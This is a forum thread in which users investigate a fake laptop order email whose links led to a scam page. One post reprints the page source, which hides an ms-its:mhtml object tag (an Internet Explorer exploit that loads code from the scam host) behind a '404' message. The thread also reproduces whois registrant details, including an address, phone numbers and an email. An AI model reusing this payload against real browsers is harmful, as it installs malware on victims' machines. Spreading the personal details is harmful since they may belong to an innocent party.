I've just had this e-mail turn up:

* * * * *

Thank you for your order!

You order summary:

IBM ThinkPad R50 Intel Pentium 1700 Mhz
512Mb RAM, 40 Gb Hard Drive, 15 " TFT XGA, 64Mb Shared Graphics, MS Works 7.0 Software, 5 x USB Connections, Windows XP Home Edition,
1 Year Free Warranty

Your bank account is billed for:

£1099.9 9 (inc. VAT)

Your order would be shipped to the address confirmed at order.
To track your order visit:

http://sunairthebest.org/index.html?trackorder=29992kkE999

To cancel or delay the order visit:

http://sunairthebest.org/index.html?stoporder=29992kkE999


Thank you for choosing Sun Light Electronics!

SunLight Electronics
London UK
http://sunairthebest.org/

* * * * *

Now I, of course, haven't ordered this and I presume it's some sort of scam, but the site has already been deleted, so I've no idea exactly what it was trying to pull.

Anyone seen/ know anything about this one?

are you sure that they were genuine links rather than links to .scr files on your local machine. I have had a lot of mails lately with this kind of thing on. I am sorely tempted to open the links you have given... but i think i should resist....!

EDIT: couldn't resist!! page source appears as follows....

<html>
<head>
<title></title>
</head>
<body>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://sunairthebest.org//main1.chm::/main1.html" type="text/x-scriptlet"></object>
<h1>404 Not found</h1>
<h3>the page is removed for hosting policy violation</h3>
</body>
</html>

Ordinarily, I would of said some muppet typed in your address by mistake. (Happens to me a lot, I get loads of e-mails from boards and website services where Grace and Gerry tried to sign up to something), but.... The site seems a bit weird. An electronics company trading as an Org? I've done a whois on it, and it looks a bit suspect. The fact the page has been taken down for a"hosting policy violation" meant it was probably a fake site for fleecing people.

Ordinarily, I would of said some muppet typed in your address by mistake.

It's unlikely that someone would have accidentally typed my affordable leather domain in by mistake!! :)

The fact the page has been taken down for a"hosting policy violation" meant it was probably a fake site for fleecing people.

Yes, I was just wondering exactly what the scam was. I figured that because it's got the "stop" address, it's maybe trying to confirm addresses for future spam, but I don't know.

Yes, I was just wondering exactly what the scam was. I figured that because it's got the "stop" address, it's maybe trying to confirm addresses for future spam, but I don't know.

I suppose whatever nefarious act it was doing, it's finished with now, because the host company has pulled it. However, if you email hillaryjknowles@yahoo.co.uk and ask her reeeeeally nice, she might tell you :)


Registrant Name:LEW inc
Registrant Organization:LEW inc
Registrant Street1:200 Sutton Passeys Crescent
Registrant City:Wollaton
Registrant State/Province:NA
Registrant Postal Code:NG8 1DZ
Registrant Country:GB
Registrant Phone:+44.07899980958
Registrant FAX:+613.86242499
Registrant Email:hillaryjknowles@yahoo.co.uk

I suppose whatever nefarious act it was doing, it's finished with now, because the host company has pulled it. However, if you email hillaryjknowles@yahoo.co.uk and ask her reeeeeally nice, she might tell you :)
or we could phone her ... anyone dare? :D

Don't forget that spammers will often fake name/details of a company purely to get innocent businesses into trouble.

See the 5th post on my spam fighting thread where "Joe Jobbing" is explained :

http://www.cableforum.co.uk/board/showthread.php?t=10441

Simply doing a WHOIS on a domain, without checking the email header will often lead you to the innocent party.

* I'm not saying that this is the case for the above situation, just that it's worth keeping in mind when investigating spam.

I've just had this e-mail turn up:

* * * * *

Thank you for your order!

You order summary:

IBM ThinkPad R50 Intel Pentium 1700 Mhz

* * * * *

Now I, of course, haven't ordered this and I presume it's some sort of scam, but the site has already been deleted, so I've no idea exactly what it was trying to pull.

A follow up to this:

http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/

Apparently it's an attempt con people into allowing a trojan onto their computer to exploit a new IE vuln.

Since I use Netscape I'm not worrying but if anyone who uses IE did get to look at the site before it was pulled they'd better do a virus check.